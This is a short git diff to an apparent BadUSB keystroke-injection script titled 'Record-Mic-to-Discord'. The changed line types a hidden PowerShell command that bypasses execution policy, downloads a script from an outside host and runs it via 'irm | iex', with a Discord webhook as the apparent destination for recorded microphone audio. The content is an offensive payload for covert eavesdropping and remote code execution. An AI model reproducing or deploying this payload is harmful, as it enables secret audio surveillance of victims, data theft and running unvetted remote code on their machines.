diff --git a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt index 236399d..c4f18f9 100644 --- a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt +++ b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt @@ -12,7 +12,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm is.gd/bwmictodc | iex +STRING powershell -NoP -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE' ; irm https://bw0.cc/dcmic | iex ENTER